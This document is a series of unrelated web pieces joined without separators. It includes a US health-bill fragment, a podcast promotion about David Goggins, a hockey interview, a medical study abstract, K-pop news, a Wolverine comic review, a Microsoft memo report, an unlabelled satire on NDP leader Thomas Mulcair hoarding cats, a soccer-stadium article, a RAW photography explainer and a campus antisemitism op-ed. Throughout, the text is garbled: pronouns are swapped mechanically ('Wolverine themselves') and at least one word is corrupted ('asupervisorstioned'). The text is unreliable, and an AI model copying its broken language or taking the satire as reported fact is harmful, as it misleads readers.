Again , this does n't mean that the Republican bill gives insurers a free pass to deny coverage because of these conditions , though people who , for example , can not afford higher costs could lose insurance in states that receive a waiver from community ratings .
The bill could lead to “ astronomically high premium increases for people with many of these conditions , if they buy insurance on their own and have a gap in coverage , ” said Larry Levitt , an executive with Kaiser . “ Even if states seek a waiver , not everyone with these conditions would lose insurance , but some certainly would . ”
Navy SEAL David Goggins Is The Toughest Athlete On Earth — Thoughts On Mindset , The 40 % Rule & Why Purpose Always Trumps Motivation
{ { currentTime / duration } } { { currentTime | prettyTime } } { { duration | prettyTime } }
“ When you think you 're done , you 're only at 40 % of your total potential. ” David Goggins
This week 's guest is incontrovertibly the most inspirational person I have ever met — a man that will catapult you into 2017 with the inspiration and tools to chase huge dreams , shatter limits , and actualize your best , most authentic self .
Often referred to as the toughest athlete on the planet , David Goggins ( @ davidgoggins ) is the only member of the US Armed Forces to complete SEAL training ( including THREE Hell Weeks ) , the U.S. Army Ranger School ( where they graduated as Enlisted Honor Man ) and Air Force tactical air controller training .
But David is perhaps best known for their superhuman feats of strength and ultra-endurance .
After several of their friends died in a 2005 helicopter crash while deployed in Afghanistan , David honored their memory by tackling the 10 most difficult endurance challenges on Earth to raise funds and awareness for the Special Operations Warrior Foundation , which provides college scholarships and grants to the children of fallen special ops soldiers .
Hence began a most unexpected yet remarkably storied athletic career as one of the world 's most accomplished endurance athletes . Highlights include :
2013 : world record for most pullups in a 24 hour period ( 4,030 ) ;
2007 : 3rd place — Badwater 135 – a 135 mile ultramarathon across Death Valley widely considered to be the world 's most difficult foot race ;
2006 : 2nd place — Ultraman World Championships , a double-ironman distance race widely considered to be the world 's most difficult triathlon ;
2007 : 1st place — 48-Hour National Championship endurance foot race , where they ran 203.5 miles , beating the previous record by 20 miles ; and
2007 – 2016 — additional top finishes at dozens of the world 's most grueling endurance races , including The HURT 100 , Leadville 100 , Western States & more .
But perhaps David 's greatest accomplishment is that throughout their life , they have faced and overcome a concatenation of seemingly insurmountable obstacles to become the man they are today – obstacles like asthma , sickle cell anemia , psychological and physical abuse , obesity , academic struggles , and even a congenital heart defect that often left them competing — and winning — on a mere fraction of their actual physical capabilities .
In addition to being one of the most remarkable people I have ever met , David has had a profound impact on me personally . It was their singular example that ignited my passion for ultra-endurance and fueled the self-belief required to pursue a new life . In truth , I 'm not sure I would have achieved my athletic and life goals had they not blazed the path before me . I simply can not ever repay the debt of gratitude I have for this man .
One of the most powerful podcasts I have ever produced , this is a conversation about the primacy of purpose to cultivate your inner voice . It 's about passion and self-accountability . It 's about the limiting beliefs that hold us back and the importance of mindset to overcome them . And it 's about the embrace of suffering as a crucible for growth and self-knowledge .
But ultimately , this is a conversation about what it means to be truly alive .
Welcome to 2017 people . It 's time to check your excuses at the door . It 's time to stop talking yourselves out of being great . It 's time to get comfortable being uncomfortable . It 's time to wake up . Because your life is not some future event . Your life is now .
Peace + Plants ,
P.S . – If you enjoy this podcast and ca n't get enough of Goggins , you 'll dig my podcast with Jesse Itzler , author of Living With A SEAL . I 'll give you one guess who that SEAL is .
Listen & Subscribe on iTunes | Soundcloud | Stitcher | GooglePlay
Spots are now available for Plantpower Austraila , Feb. 20-27 , 2017 . For info visit plantpowerworld.com
Check out Julie 's podcast divine throughline
Thanks to this week 's sponsor :
Harrys.com : A superior shave at an affordable price . Friends of the Rich Roll Podcast can visit Harrys.com/ROLL to redeem your Free Trial Set , which comes with a razor , five-blade cartridge , shaving gel , and post shave gel . All you pay is just shipping .
MeUndies : The world 's most comfortable underwear ! Visit MeUndies.com/ROLL to get free shipping ( in the U.S. & Canada ) and 20 % off your first pair .
With the NHL lockout now in its 75th day , Ottawa Senators captain Daniel Alfredsson and a few of their teammates have been skating with the Carleton Ravens at the Ice House off and on since mid-November . Although the rest of the Senators returned to the Bell Sensplex on Wednesday , Alfredsson stayed behind . The Charlatan 's Farhan Devji sat down with them after Thursday 's practice .
The Charlatan ( TC ) : You have been practicing at Carleton for a few weeks now . Why the change of scenery ? What brought you guys here ?
Daniel Alfredsson ( DA ) : Good practices . We 're probably only six or seven guys left that are practicing . To get a chance to be in this environment is a lot more fun and more productive for us as well . And I think we can help out with raising the pace a little bit .
TC : I know these are just practices , but what are your thoughts on the level of play with these guys ?
DA : It 's been really good . I 'm impressed especially with the work ethic and professionalism that they 've shown . They have long days in school as well – not just hockey . It 's been a lot of fun for me to see . They work really hard and they have a goal in mind , which is fun to watch .
TC : Did you know much about Carleton or the Ravens before these practices ?
DA : Well , I 've been a couple of times . I did a ceremonial puck drop one game and I know “ Vanner ” obviously playing with them for a few years . But I ca n't say I know much about the players .
TC : Speaking of Shaun Van Allen , what 's it like taking orders and instructions from him ?
DA : There 's no change , I did the same when they were playing . Nothing 's changed .
TC : Being here at Carleton , I know it 's a balance because you want to practice but at the same time you want to teach these guys some things . How do you deal with that ?
DA : I just try to melt in , give them some hints here and there maybe . I think they watch what I do and pick up stuff from that . These are guys that have played hockey for a long time . They know what they 're good at and what they need to improve on . I can give a few hints here and there , which I really enjoy doing .
TC : Earlier in the year , you were only practicing a few times a week . This is now your fourth straight ice time this week at Carleton . What 's the reasoning behind that ?
DA : Just because it 's more fun , too . I played in a charity game in Atlantic City on Saturday , which brought a little more joy back for the game of hockey , I guess . I practiced here on Monday and I thought it was a lot of fun . So I came back every day .
TC : As for the NHL lockout , how frustrating is it not to be playing hockey at this time of the year ?
DA : It is and it is n't . I have a busy life outside hockey obviously with four kids . I enjoy that time as well . When you play charity games like I did or when you 're in an environment like this with a team . . . we love the game . If I retired , I would still enjoy coming out on the ice . That 's when you miss it . That 's when it 's a little bit harder . I know it 's a process ; I think it 's an unfortunate process but we are where we are and until we get a deal , we 've got to make the most of it .
TC : Is there hope among the players that mediation could help ?
DA : I do n't know . I have n't heard what happened yesterday . I think it does n't hurt . I 'm also not sure what level of engagement they can manage to accomplish between the two of us . I do n't know . It does n't hurt to get another view and I 'm sure they can be helpful in some areas and maybe get something going .
Psychological stress has been shown to impair wound healing , but experimental research in surgical patients is lacking . This study investigated whether a brief psychological intervention could reduce stress and improve wound healing in surgical patients . This randomised controlled trial was conducted at a surgical centre . Inclusion criteria were English-speaking patients over 18 years booked to undergo elective laparoscopic cholecystectomy ; exclusion criteria were cancellation of surgery , medical complications , and refusal of consent . Seventy five patients were randomised and 15 patients were excluded ; 60 patients completed the study ( 15 male , 45 female ) . Participants were randomised to receive standard care or standard care plus a 45-min psychological intervention that included relaxation and guided imagery with take-home relaxation CDs for listening to for 3 days before and 7 days after surgery . In both groups ePTFE tubes were inserted during surgery and removed at 7 days after surgery and analysed for hydroxyproline as a measure of collagen deposition and wound healing . Change in perceived stress from before surgery to 7-day follow-up was assessed using questionnaires . Intervention group patients showed a reduction in perceived stress compared with the control group , controlling for age . Patients in the intervention group had higher hydroxyproline deposition in the wound than did control group patients ( difference in means 0.35 , 95 % CI 0.66-0.03 ; t ( 43 ) =2.23 , p=0.03 ) . Changes in perceived stress were not associated with hydroxyproline deposition . A brief relaxation intervention prior to surgery can reduce stress and improve the wound healing response in surgical patients . The intervention may have particular clinical application for those at risk of poor healing following surgery .
TRIAL REGISTRATION :
ClinicalTrials.gov NCT00633737 .
Copyright © 2011 Elsevier Inc. All rights reserved .
Boy group B.I.G received harsh criticism from netizens for what they wrote in their most recent tweet .
On February 14th , rather than celebrating Valentine 's Day like many other young people their age , B.I.G chose to visit the “ An Jung Geun Memorial ” in memory of the late An Jung Geun , an important figure in Korean history .
The young artists marked the occasion by leaving a message via their official Twitter account that read , “ Let 's think once more upon our hero and martyr , An Jung Geun . Their last words , ‘ Even in heaven , I will work for the independence of our country ' sets fire to our hearts . ”
However , rather than receiving warm responses for their visit and message , the group was met with cold and critical reactions from netizens who expressed their displeasure and suspicions that B.I.G 's actions were only meant for publicity .
One netizen commented , “ Do n't use the late martyr An Jung Geun to market yourselves . Did you have to announce such a thing on your official Twitter…you could have just quietly visited tsk tsk . He 's not someone you can use to gain fame in such a way . ”
Another netizen agreed , stating , “ I can read you like a book , you bastards . Also , February 14th is n't anything but the date they were sentenced , so if you want to preserve their memory , do it properly on the date of their passing , March 26th , ” while another comment questioned , “ Do you not know what you should and should not do – . Are you kidding me ? ”
B.I.G debuted in July 2014 with their song “ Hello ” and celebrated their 200th day since their debut in January .
Source : Herald Finance
This review may contain spoilers . Skip To The Verdict ? »
Wolverine in the Savage Land , wrasslin ' dinosaurs .
Walter Simonson riffing on Turok : Son of Stone . Mike Mignola channeling Frazetta .
And for some reason Logan is played by Benicio Del Toro in this comic .
All that makes for a book worth checking out , right ?
Wolverine : The Jungle Adventure is a Marvel Comics prestige format ( thin , squarebound , advertising free , small graphic novel ) from 1990 .
In it , we find a self contained story in 48 pages .
Light on continuity , easy on the eyes , the book stands out from many of the other Marvel releases of the time .
Unlike the book featured in our previous Marvel prestige review , Ghost Rider / Wolverine / Punisher : Hearts of Darkness , this release is n't accompanied by any such gimmicks as a four page fold out cover spread , nor burdened by a fanserving crossover .
In fact , it 's a straight up Wolverine book , nary a fellow X-Man in sight . Of course , Logan themselves may be more than enough to draw in the true believers .
My favorite stories from this era were the Patch tales penned by Claremont in Wolverine 's new ongoing ( and collected in Wolverine Classic ) .
This book ties in well enough there . The short and hairy adventurer is sent a ticket to a Broadway premiere , where he 's pulled into a confrontation with some kind of cyborg assassin . That 's a pretty standard day for a Marvel hero , but the cyborg also smells of the Savage Land , a patch of terraformed earth in the Antarctic where dinosaurs still roam .
The Savage Land is a historied Marvel setting , but you do n't have to be familiar with it ; just know that Logan ends up in loincloth and warpaint soon enough . They actually take a bit of vacation ( not sure where this fits in time-wise , but who cares – it happens pretty often in superhero books that one issue will take months and the next tells the events of a single day . )
The conflict eventually leads to Apocalypse ( this is n't a spoiler 'cause the guy is on the cover ) and some enjoyable mayhem .
Walter Simonson ‘ s story is straightforward , narrated by the prehistoric-style shaman of the “ Man-Apes ” ( not expressly named in this book ) . There are always some issues that will rear their head around portrayal of tribe social structures by western white culture , but this book is nowhere near the travesty of Avatar .
Of course Wolverine ends up as the honored member , but we all know they are the best there is at what they do .
And the Man-Apes are kind of portrayed as of a semi-Caucasian heritage , though everyone ( including Logan ) is darkly colored .
Anyway , the story is n't about Dances with Wolves style white guilt , it 's about punching dinosaurs and tearing up cyborgs .
And you 've got to have some kind of prehistoric tribe to put the conflict in context , right ?
So let 's let it slide , this once .
Points to the creators for having a Frazetta-style female with some variety to them character .
Gahck is strong and intimidating , a far cry from the disappointing archetype we encountered back when we reviewed Tor Vol . 3 [ NSFW ] ( which actually came out after The Jungle Adventure . ) The book wo n't win any points for female bonding or pass the Bechdel test , but at least the relationships here are n't entirely predictable .
There 's some cheesecake , but much more for those interested in Mr. Howlett 's well-furred chest .
My need to discuss these issues is more from a desire to see interesting stories than my ingrained liberalism ( though I have been trained to notice it . )
Far too many writers take the easy and predictable way out in portraying tribalism and women , so it 's always nice to get a story that I can read without cringing . Cringing too much , anyway .
Moving past the social aspects , I wanted to make some brief notes about this book 's place in Marvel continuity .
I said it was pretty light , but there are a few things of interest .
First , the not so spoiler :
Tthis book apparently features Wolverine 's first meeting with Apocalypse , who had only been around for a few years at this point , and only in X-Factor .
Second – and this is a spoiler – outline the text to read : [ Wolverine apparently has KID in this book , revealed on the last page . There was some intense debate about this a few years back , but the kid is named in the Marvel handbooks and everything , so there . ]
As far as I know , the above has n't been reflected at all in modern continuity , but if you 're keeping track , it was a bit of a WTF moment on the last page , because I 'd forgotten all about it .
Simonson 's enjoyable story aside , the real draw of this book was definitely Mike Mignola ‘ s art . I 'm not deep enough in the Marvel Universe to follow every character or title , so when I impulse buy it 's often for exciting illustration or some really wacky premise ; this book had a bit of both .
Mignola is , of course , the progenitor of Hellboy , which he 's currently most well known for . He 's done a fair amount of work on superhero titles , but the ones I have are relatively obscure . For DC , there was the Starlin penned Cosmic Odyssey and the finally collected Batman/Starman/Hellboy crossover .
On this title , Mignola is perfect . Their prehistoric denizens are a combination of hulking frames and moving expressions . Their backgrounds are sparse , but perfectly composed . Their dinosaurs are appropriately menacing and evil lairs full of the requisite mechanical doodads .
Mignola 's strength has always been in creating panels full of drama and tension , composed almost entirely of shadow and the odd figure . There 's plenty of that here , but also some moving portraits and more tender moments .
I mentioned earlier that Wolverine seems to be played by Benicio del Toro . It was a silly remark , but I hold to it . I hope you do n't take it as a negative , because I 'd certainly see a film with that casting .
It 's the big lips and squinty eyes – sometimes sad , mischievous at the best of moments , and full of rage when you 'd expect .
As for Gahck , she 's shapely and powerful . I admire the way Mignola has drawn the women . Great beauty combined with realistic proportions .
There is the odd Liefield foot ( angled to a suggested point instead of fully fleshed ) and many feet hidden behind cleverly placed tiny hills – but you do n't really notice this unless you 're nitpicking for it . And I actually like the dynamic motion reinforced by those slashed foot impressions , especially in silhouette .
Mignola more than makes up for a few cropped feet by perfectly rendering an entire sequence starring Logan 's little piggies . They are the best there is at what they do .
Finally , the villain is a lot of fun to look at .
I 've always thought Apocalypse had a kind of silly design ( like many Marvel characters , I 'll admit ) but here their armor is downplayed into a single color and form , while their head is given a gigantic mouth reminiscent of South Park 's Canadians .
I love it , he 's like a giant evil Muppet .
Maybe that 's not what you 're looking for in your Apocalypse , but it tickled me .
Wolverine : The Jungle Adventure tells a tale of action that could take up a miniseries of four times the size in today 's comics .
It 's compact , well paced , and accompanied by some sterling art .
And this book can be found for a dollar at many used comic shops !
What are you waiting for ?
Verdict :
4 out of 5 stars . This adventure gives a lot of bang for your buck , especially if you like Mignola 's artwork , all wrapped into a tasteful little prestige book .
Great package , great value .
Essential Continuity :
Not really . While Wolverine themselves is central to the Marvel Universe , this book is n't .
There are some events in here that reflect continuity and plenty of name dropping , but I highly doubt anything is essential .
It 's a good display of Logan 's character , though , one of their more enjoyable stand-alone stories .
Read first :
There has been intense debate about good starting places for Wolverine .
Their original introduction ( collected in many places , such as Wolverine Battles The Incredible Hulk ) is of interest mostly to aficionados , as their battle with The Hulk does n't have much of what makes them so lovable today .
The Weapon X miniseries is kind of tough to start with as well , since it answers many questions but also spoils some of the intrigue involved in their early stories .
It 's quite possible that the best way to get introduced , for someone entirely new to the X-Men family , is watching the X-Men movies . It 's how my fiance did it , and they now understand them as well as most comic fans . Plus Hugh Jackman , rawr .
If I had to direct you to a single volume , I would suggest the oversized hardcover The Best Of Wolverine Vol . 1 . That book collects their first appearance in The Incredible Hulk , the 1982 Frank Miller/Chris Claremont miniseries , a crossover with Captain America , Uncanny X-Men # 205 , and the Weapon X story from Marvel Comics Presents , which I mentioned before .
Reading that book straight through is as good an introduction to the character as any I 've found – and a lot of the other “ origins ” books will only serve to thoroughly confuse a new reader .
Read next :
Wolverine is one of the most popular characters in the Marvel Universe ( and even pop culture in general ! )
You can simply follow the Wolverine tag list to read all their books in order .
I highly recommend the Wolverine Classic trade series , which was also from this era . Marvel Comics Presents Wolverine was a favorite when I was a kid , but I honestly ca n't tell you if it 's any good from recent experience . Hopefully I 'll review them soon !
« Back to the top ?
Microsoft CEO Satya Nadella sent a broad email to all employees today outlining the company 's ambitions for the new financial year . Top of the agenda is reshaping what the `` core '' of Microsoft is , and Nadella admits the devices and services description , introduced by former CEO Steve Ballmer , was helpful , but that `` we now need to hone in on our unique strategy . '' That unique strategy is a Microsoft that 's focused on mobile and cloud , a similar message that Nadella has hinted at previously . `` We will reinvent productivity to empower every person and every organization on the planet to do more and achieve more , '' Nadella boldly states .
Xbox is safe at the new Microsoft
While Nadella might be dropping the devices and services moniker , that wo n't directly impact products like Xbox , Surface , and Windows Phone just yet . `` We are fortunate to have Xbox in our family to go after this opportunity with unique and bold innovation , '' says Nadella . `` Bottom line , we will continue to innovate and grow our fan base with Xbox while also creating additive business value for Microsoft . '' On the Surface side , Nadella name checks the Surface Pro 3 as an example of how Microsoft will build first-party hardware to boost the Windows ecosystem . `` That means at times we 'll develop new categories like we did with Surface . It also means we will responsibly make the market for Windows Phone , which is our goal with the Nokia devices and services acquisition . ''
Nadella is also planning to reshape Microsoft 's various product teams and engineering processes to `` be customer-obsessed , data-driven , speed-oriented and quality-focused . '' Part of that is an effort to remove some processes and have fewer employees focused on decisions . Another part is improving training and investments in having Data and Applied Science resources in each engineering group . That , Nadella hopes , should help Microsoft speed up its software engineering processes , while maintaining the quality of Microsoft 's software products . The software maker has been caught off guard a number of times over the years as more nimble competitors like Google have rapidly built products and shipped updates at a more rapid pace than Microsoft .
`` Nothing is off the table ... ''
Nadella 's note to Microsoft employees also recognizes that the future the company faces is challenging . `` I consider the job before us to be bolder and more ambitious than anything we have ever done , '' admits Nadella . Encouraging Microsoft employees to help build a new culture to foster the company 's future , Nadella says `` nothing is off the table in how we think about shifting our culture to deliver on this core strategy , '' and that `` tired traditions will be questioned '' along with priority adjustments . Nadella is clearly ready to challenge and change Microsoft , to awaken its employees and reboot the company with a fresh strategy and vision . The timing comes shortly before Microsoft reports its latest financial results , and amid rumors the company is planning layoffs shortly . Nadella does n't touch on those aspects , instead focusing on the future . `` We will collectively transform this company and seize the great opportunity ahead . ''
OTTAWA – NDP Leader Thomas Mulcair has adopted yet another stray cat , bringing the total number of felines in their one-bedroom apartment in Ottawa to 44 .
Mulcair made the announcement on social media last night , however , fellow party members are becoming concerned about their ability to take care of so many cats .
“ He really has n't been the same since their party voted to replace them last year , ” explained fellow MP Guy Caron . “ It first started with one cat they adopted from the local shelter , but they always said they could take on more . Now , he 's just been picking up any feline they find on the street…even the ones with the collars . ”
The Outremont MP has made several appearances in the House of Commons covered in a fine layer of cat hair and has left early explaining they needed to purchase more cat litter or had a vet appointment .
“ You 'll have to excuse me , I need to pick up Tommy Douglas Jr 's ear medicine , ” said Mulcair during Question Period . “ And I think Mr. Woodsworth and Mitsy have worms so I wo n't be here tomorrow . ”
The Ottawa Humane Society reported that Mulcair is barred from the premises after they took home every single one of their cats using a variety of disguises and aliases .
“ We keep a photo of [ Mulcair ] on our wall just in case someone forgets , ” said an Ottawa Humane Society spokesperson pointing at MP 's portrait . “ We also informed shelters within a 100 km radius about him . ”
Major League Soccer would have $ 1.2B impact on region , study says
The Orlando City Lions are now part of the United Soccer League , but president Phil Rawlins said the team has been all but promised a MLS franchise in Orlando – if it gets a stadium of its own .
Orlando City Soccer Club sought to rouse support for a new public-private soccer stadium Tuesday with the release of a study showing that Major League Soccer would have a $ 1.2 billion economic impact on the region .
The stadium would cost about $ 96.5 million , and team executives hope Orlando and Orange County will help cover the cost . But beyond that , no financial details have been discussed . It 's not clear whether taxpayers will be asked to cover only land costs or a portion of construction as well .
`` Our next steps really are to sit down with the city and the county . We 've always said from day one , we 'd love to see this as a private-public partnership , '' Rawlins said . `` We 're not asking the city and the county to fund this , we 're looking for a private-public partnership to make this happen . ''
Orlando City Soccer now plays at the Citrus Bowl . MLS would allow the team to continue in that venue , but only for so long ; Rawlins said that to earn an MLS franchise , the Lions must have a plan in place for their own facility .
If the stadium is built and Orlando becomes home to an MLS franchise , the area can expect to see new direct spending of $ 1.2 billion over the next 30 years , according to the study produced by the consulting firm CS & L . The stadium would produce 390 jobs , personal earnings of $ 565 million and tax revenue of $ 9.1 million , CS & L 's Brian Parker said .
But Rawlins also focused on the intangible elements of having a major-league team in Orlando : improved quality of life and international media exposure .
`` We have a fantastic opportunity to bring a second pro major league sports franchise to the city , and it 's an opportunity that will not last forever , '' Rawlins said . `` It 's a great opportunity to build civic pride . ''
Orlando Mayor Buddy Dyer and Orange County Mayor Teresa Jacobs have each toured MLS stadiums with Orlando City Soccer executives – most recently last weekend , when Jacobs toured PPL Park in Pennsylvania and met with the facility 's architects and the Philadelphia Union 's owners .
As a minor-league team , Orlando City Soccer has drawn an average of 7,000 fans per game in its 2012 season , according to the team . That 's the most of any USL team , but Rawlins said MLS status would bring more fans .
Four USL teams that moved to MLS saw substantial increases in attendance ; the Seattle Sounders went from 3,342 to 30,897 in their first MLS season . The Portland Timbers have sold out their 18,827-seat stadium for the past 35 consecutive games .
mschlueb @ tribune.com or 407-420-5417
Smartphone photography has moved on quite a lot in the past couple of years , so far in fact that flagship handsets are now touting the ability to save high quality RAW images . Photography enthusiasts no doubt associate the RAW format with professional photography , while the rest of us probably view it as just another setting in a growing list of features . Today we 're going to break down exactly what the RAW format is and whether you should bother taking pictures in it .
It 's in the name
The name RAW actually gives us a pretty good idea what it 's all about . A picture saved as a RAW image is simply the raw data coming directly from the image sensor , unprocessed , unedited and uncompressed . This is quite different to JPEG , the very common image format that your smartphone and other camera 's default to , which is a lossy compressed format that uses algorithms and clever tricks to remove bits of data that are n't strictly needed . As a result , RAW image files are significantly larger than JPEG 's , often 3 to 6 times the size , which is definitely something to consider when picking between the two . This larger file size also takes considerably longer to save , so taking repeated quick shots in RAW can be impossible if your hardware is n't up to it .
The reason RAW files are so much larger is because they store up to 12-bits of red , green , and blue color data per sensor pixel location compared with the fixed 8-bit levels of brightness with JPEG , although this varies on the image sensor and connected processing hardware . Your smartphone or DSLR will come fully loaded with its own processing solution built in ( firmware ) , which will use this data and sharpen up the image , process the contrast and dynamic range , and then export this to a JPEG all at the click of the shutter . If you see handset manufacturer updating their camera quality with a software update , this is what they 're making tweaks too .
Interestingly , a basic RAW image will often appear lower in contrast and not as sharp as a processed image . However , if you do n't like the manufacturer 's choice of processing or want to make these type of adjustments yourself , then you 'll want to shoot in RAW . It 's also important to note that RAW is n't an image format in the same way that JPEG is . It contains all of the information needed to create an image based on data from the sensor , but does n't present this in a per-pixel data format that you would typically associate with an image of a certain resolution . You 'll need special software to view , edit and print RAW files , and images will ( almost ) always be exported to another type of format for uploading to the web or printing . Smartphones with RAW support , such as the HTC 10 , will still output a JPEG version along with the RAW data for users to view , share , and upload .
RAW , what is it good for ?
With all this extra data , RAW is the format of choice for making major edits to your pictures . One of the major benefits of RAW is the ability to better adjust the picture 's white balance to fix under or overexposed images , while still retaining high levels of detail . This is all thanks to the high RGB bit-depth data that is retained across the whole picture . JPEG , on the other hand , has already thrown away much of the lower contrast information that your eye finds difficult to detect , but this may lead to noticeable artifacts when adjusting the white balance or color levels in editing . You might also see additional noise in a heavily compressed JPEG image , known as compression artifacts , as more and more data is discarded in favor of a smaller image size .
While you can certainly adjust the white balance , contrast , and dynamic range of a JPEG image with pleasing results , RAW lends itself to a much higher number of edits before the quality begins to degrade . As I mentioned before , those minor contrast difference losses with the JPEG format can become much more noticeable if you apply multiple white balance and color changes to an image . With RAW you can also apply more powerful custom enhancements , such as de-noise or sharpening algorithms , to the original image . You wo n't be able to produce these custom results if you 're applying a filter to an image that has already been given a sharpening pass from the camera 's firmware .
Another benefit of the RAW format is that you 're able to export to any “ color space ” you want . There are a variety of different models out there , some of which you may also recognize if you 've read up on display calibration . sRGB is suitable for most web content , but professional services , such as magazine or poster printing , may use the Adobe or ProPhoto RGB models . With RAW you can export to any of these you like , depending on what you want to use the image for .
Essentially , RAW opens the door to much better editing tools , but it requires a lot more work than just letting your camera handle the image processing . So , if you 're planning to upload your phone 's pictures straight to Facebook with minimal hassle , then there 's absolutely no point in shooting in RAW . Firstly because Facebook does n't understand RAW , and secondly if you 're not processing and editing the picture manually , then you may as well let your phone handle that for you as soon as you take the picture . But if you 're looking to make the most of your pictures with some post-editing , then you 'll certainly want to shoot in RAW .
What RAW can and ca n't do for you
With all of the above being said , it should be clear that shooting in RAW is n't automatically going to make your pictures look any better , it 's just there to allow for superior editing . Furthermore , RAW is n't going to introduce additional detail or dynamic range into a picture that your camera 's image sensor is n't capable of capturing anyway . Therefore , when we 're dealing with smaller , typically noisy smartphone image sensors , RAW is n't going to boost the image quality to match a high-end DSLR camera .
Another way of looking at it is that a JPEG taken straight from a high quality DSLR camera will still look better than an edited RAW image captured from a cheap point-and-shoot or a smaller smartphone image sensor . So when it comes to smartphones we really need to ask ourselves if the sensors are good enough to justify shooting in RAW at all .
To put this to the test I 've taken an HTC 10 out for a spin , complete with the latest camera quality update . I 've captured a selection of pictures in both RAW and JPEG and also done some very basic editing to the pictures to see if the camera is actually capable of capturing enough detail to make editing worthwhile . Of course , I 'm not going to be able to make my RAW edit look exactly like HTC 's algorithm and that would also sort of defeat the point . Instead , I 'm going to aim to closely match HTC 's color pallet and target a realistic rather than artistic look to see if even an amateur editor like myself can benefit from RAW . Fortunately , the HTC 10 also offers up the ability to automatically enhance RAW files and export them as JPEG 's with better dynamic range and detail , so we can test what improvements , if any , HTC 's specially designed RAW enhancements offer when compared with its default JPEG processing . While we 're on the subject , here 's a sample of the type of enhancements that HTC offers its users ( click to enlarge ) :
At a casual glance there really is n't much to tell between the regular JPEG and HTC 's RAW enhanced pictures , suggesting that the HTC 10 is n't throwing in much in the way of post-processing or color alterations . A zoom in to the 100 percent crops reveals a marginal increase in detail when exporting from RAW and some deeper looking blacks , but this probably owes more to the extra use of a sharpening filter and slightly more contrast than anything else . Unfortunately , we can also easily spot sharpening artifacts and extra noise introduced in the sky , which really is n't very good at all .
OK , so the simple one button editing option is a little underwhelming and is n't really the sort of solution that RAW enthusiasts would be after anyway . The more important question is can we do better with these smartphone files if we really want to get creative ? While it 's certainly a lot more work , the answer , at least in my experience , is yes . I 'll leave you to judge the results ( and my limited editing skills ) for yourselves , but here are a couple of crops and edits that I 've made by doing nothing more than adjusting the exposure , white balance , and color temperature of these pictures using some free RAW editing software . No filters , no sharpening , no photo-shopping . Incidentally , these are all also options that you 'll find in the HTC 10 camera 's manual mode .
The final and arguable most useful aspect of shooting in RAW left to cover is the ability to correct over and underexposed pictures . We know that smartphones can definitely have problems with this , and those getting to grips with manual or pro camera modes may find the ability to correct errors especially useful . I shot this deliberately overexposed picture of a small valley and have attempted to improve the exposure of both the default JPEG and RAW images , to try to demonstrate how fixing this problem in RAW is easier than it is with an already converted JPEG file .
While my JPEG restoration does a passable job of sorting out the overexposed foreground , it 's pretty much impossible to bring back the blue of the sky using basic editing tools . You can also see some artifacts and odd colors starting to creep in around the cloud line , simply because the data required is missing from the compressed JPEG file . Interestingly , the HTC 10 's Raw Enhancement button makes some much more drastic changes to the picture to sort out the exposure than before , and does a pretty good job as a result . However , you have to manually adjust the exposure and white balance yourself if you really want to bring back the blue in the skyline . Either way , we can conclude that shooting in RAW , even while using a smartphone , is the best way to be able to correct any exposure mistakes .
Wrap up
Hopefully this article has given you some insight into what RAW is , and what the format is and is n't useful for . To sum up , shooting in RAW is only worth while if you 're going to be doing a fair bit of manual editing yourself . The one click “ enhancement ” button found in the HTC 10 has it 's uses , but it is n't going to drastically improve the look of every picture that you take . Not to mention that the files take up considerably more storage space . If you 're going to be quickly uploading your pictures to social media or sharing them online then sticking with JPEG is definitely the sensible choice .
What about yourselves , have you found the manual modes and RAW shooting options included with today 's modern flagships useful at all ?
In the US , we do n't hear much positive news about how Jews and Israel are treated on college campuses in the United Kingdom . In fact , we mostly hear horror stories .
It was refreshing , therefore , to learn that a “ Jewish Equality Act ” was adopted by the Students ' Union at the University of London . This measure approved offering kosher dining options , access to multi-faith rooms and the rescheduling of events conflicting with Shabbat and the Jewish holidays . This was an especially impressive decision given that the asupervisorstioned college had just 39 students who identified themselves as Jewish when the act was passed .
Yet , sadly , even this triumph of common sense was marred when one clause was dropped from the final measure .
What was the offending clause ?
It said that “ Jewish students should be given the right to self-determination and be able to define what constitutes hatred against their group , like all other minority groups . ”
The President of the School of Oriental and African Studies ( SOAS ) Jewish Society , Avrahum Sanger , proposed the act . “ Removing this line , ” they said , “ tells me and my Jewish peers that we are not able to define our own oppression , that we are not able to self-determine our identity … that it is one rule for [ us ] and another for every other minority group . ”
This was just the latest example of a type of bias we see on US campuses — where non-Jews tell Jews how they should feel , what offensive language and behavior they should tolerate and what constitutes antisemitism .
This is outrageous . Jews are treated like no other minority . Worse , university officials allow this discriminatory treatment and often defend it .
Imagine if African American students protested statements made on campus that they considered racist , and then the people who made the statements said that African Americans are not the arbiters of what is and is not racist . No one would accept that argument on any campus in America . The same test could be applied to issues of sexism or attacks on gay students .
The situation regarding Jews is the only exception .
This perversion of language and human rights has allowed antisemites to openly criticize Jews and Israel on American campuses , and get away with it . At the same time , hate speech directed against any other group is shut down immediately . If there is the slightest hesitation , protests are mounted until the offensive speech is curtailed and the speaker is punished .
Remember , for example , the uproar when members of a fraternity at the University of Oklahoma were filmed singing a racist song on a bus off campus ? University President David Boren expelled two students who were involved , an action several law professors called unconstitutional . Even before that incident , the university had created a five-hour course on diversity for faculty and first-year students , apparently in response to rumors of a planned “ Cowboys and Indians ” themed fraternity party .
Now let 's apply the same standard to the students who will be sponsoring Israel hate weeks on campuses over the next several weeks , and the promoters of the college 's BDS campaign . Jewish students ( and Jews around the world ) have said many of these programs are antisemitic . In 2015 , the heads of more than 60 international Jewish organizations from all sides of the political and religious spectrum agreed that :
The BDS movement is antithetical to principles of academic freedom and discourages freedom of speech . The movement silences voices from across the Israeli political spectrum . By pursuing delegitimization campaigns on campus , proponents have provoked deep divisions among students and have created an atmosphere of intolerance and hatred .
Moreover , the signatories said : “ We recognize and accept that individuals and groups may have legitimate criticism of Israeli policies . Criticism becomes antisemitism , however , when it demonizes Israel or its leaders , denies Israel the right to defend its citizens or seeks to denigrate Israel 's right to exist . ”
Jews decide what constitutes antisemitism . If Jewish students tell officials that certain statements and acts are antisemitic , then the administration should react the same way it would if African American students complained about peers engaging in race baiting .
One problem is the timidity of Jewish students . Other minorities do not hesitate to organize protests . Yet Jews , for some reason , have never had the fortitude , the interest , or the training to mobilize large numbers of their peers to demonstrate for their rights . Imagine if hundreds of Jews , at campuses like UCLA or NYU , marched and organized themselves . This would force officials to take the antisemitic behavior of groups such as Students for Justice in Palestine ( SJP ) seriously .
Jewish students should demand that Israel hate weeks be banned , and that SJP and other groups espousing antisemitic views ( typically with student and taxpayer funding ) should be banned from campus .
So far , Fordham University is the only campus that has had the courage to do so , despite the howls of protest from defenders of antisemitic speech .
